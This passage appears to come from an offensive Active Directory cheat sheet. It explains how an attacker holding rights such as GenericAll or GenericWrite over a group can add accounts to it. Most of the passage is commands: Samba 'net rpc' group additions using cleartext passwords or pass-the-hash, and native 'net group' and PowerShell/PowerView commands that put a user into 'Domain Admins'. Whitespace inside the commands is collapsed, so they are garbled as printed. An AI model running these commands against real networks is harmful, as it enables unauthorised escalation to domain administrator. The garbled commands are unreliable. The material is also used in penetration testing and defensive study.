This abuse can be carried out when controlling an object that has a GenericAll, GenericWrite, Self, AllExtendedRights or Self-Membership, over the target group.
Alternative #2: using net, a tool for the administration of samba and cifs/smb clients. The pth-toolkit can also be used to run net commands with pass-the-hash.
# With net and cleartext credentials (will be prompted)netrpcgroupaddmem $TargetGroup $TargetUser -U $DOMAIN/$ControlledUser -S $DomainController# With net and cleartext credentialsnetrpcgroupaddmem $TargetGroup $TargetUser -U $DOMAIN/$ControlledUser%$Password -S $DomainController# With Pass-the-Hashpth-netrpcgroupaddmem $TargetGroup $TargetUser -U $DOMAIN/$ControlledUser%ffffffffffffffffffffffffffffffff:$NThash -S $DomainController
The attacker can add a user/group/computer to a group. This can be achieved with a native command line, with the Active Directory PowerShell module, or with Add-DomainGroupMember (PowerView module).
# Command linenet group 'Domain Admins''user'/add /domain# Powershell: Active Directory moduleAdd-ADGroupMember-Identity 'Domain Admins'-Members 'user'# Powershell: PowerSploit moduleAdd-DomainGroupMember-Identity 'Domain Admins'-Members 'user'